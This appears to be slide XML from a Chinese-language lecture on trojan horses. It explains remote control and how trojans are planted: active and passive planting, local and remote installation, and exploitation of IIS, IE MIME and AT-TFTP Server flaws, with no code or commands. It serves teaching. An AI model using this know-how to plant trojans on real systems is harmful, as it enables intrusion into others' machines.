            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>远程控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3260341" y="2411413"/>
            <a:ext cx="5683634" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688293699"/>
      </p:ext>
    </p:extLst>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43139">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">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124313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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传播木马：木马植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620713" y="1382712"/>
            <a:ext cx="7772400" cy="4876198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马植入技术可以大概分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主动植入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>被动植入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两类。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主动植入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者主动将木马程序种到本地或者是远程主机上，这个行为过程完全由攻击者主动掌握。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>被动植入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者预先设置某种环境，然后被动等待目标系统用户的某种可能的操作，只有这种操作执行，木马程序才有可能植入目标系统。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3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、主动植入 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48134" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658813" y="1449388"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主动植入一般需要通过某种方法获取目标主机的一定权限，然后由攻击者自己动手进行安装。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>按照目标系统是本地还是远程的区分，这种方法又有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>本地安装与远程安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之分。</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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、主动植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49158" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393098" y="1408003"/>
            <a:ext cx="8041453" cy="4637087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>由于在一个系统植入木马，不仅需要将木马程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到目标系统，还需要在目标系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马程序，所以主动植入需要具有目标系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>写权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可执行权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果仅仅具有写权限，只能将木马程序上传但不能执行，这种情况属于被动植入，因为木马仍然需要被动等待以某种方式被执行。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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）本地安装</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50182" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563563" y="1249362"/>
            <a:ext cx="7772400" cy="4637087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>本地安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就是直接在本地主机上进行安装。一个人很难确保除了自己之外自己的计算机不会被其他人使用。而在经常更换使用者的公共场所（如网吧、饭店、宾馆、咖啡店等）的计算机上，这种安装木马的方法更是非常普遍、有效。</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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）远程安装</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51206" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696913" y="1344613"/>
            <a:ext cx="7772400" cy="4722812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>远程安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就是通过常规攻击手段获得目标主机的一定权限后，将木马上传到目标主机上，并使其运行起来。例如，某些系统漏洞的存在，使得攻击者可以利用漏洞远程将木马程序上传并执行。从实现方式上，主要分为：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用系统自身漏洞植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用第三方软件漏洞植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）利用系统自身漏洞植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52230" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528857" y="1367659"/>
            <a:ext cx="7848600" cy="5067300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>这是一种主动攻击的方式。攻击者利用所了解的系统的安全漏洞及其特性主动出击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器的溢出漏洞，通过一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>IISHack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的攻击程序就可使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器崩溃，并同时在被攻击服务器执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程序。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞则是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Internet Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在处理不正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>类型存在的问题，攻击者有意地更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>类型，使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可以不提示用户而直接运行电子邮件附件中的恶意程序等。</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p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）利用第三方软件漏洞植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481013" y="1504950"/>
            <a:ext cx="8181975" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>每台主机上都会安装一些第三方软件或者提供服务，但是这些软件可能存在可被利用的漏洞，如果被恶意者利用，你的主机就可以成为木马的“栖息地”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AT-TFTP Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在处理带有超长文件名参数的请求时存在漏洞，远程攻击者可能利用此漏洞在服务器上执行任意指令。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、被动植入 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54278" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642390" y="1303556"/>
            <a:ext cx="7772400" cy="4766167"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被动植入主要是利用以下方式将木马程序植入目标系统：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页浏览植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用电子邮件植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用网络下载植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用即时通工具植入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与其它程序捆绑</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用移动存储设备植入</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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
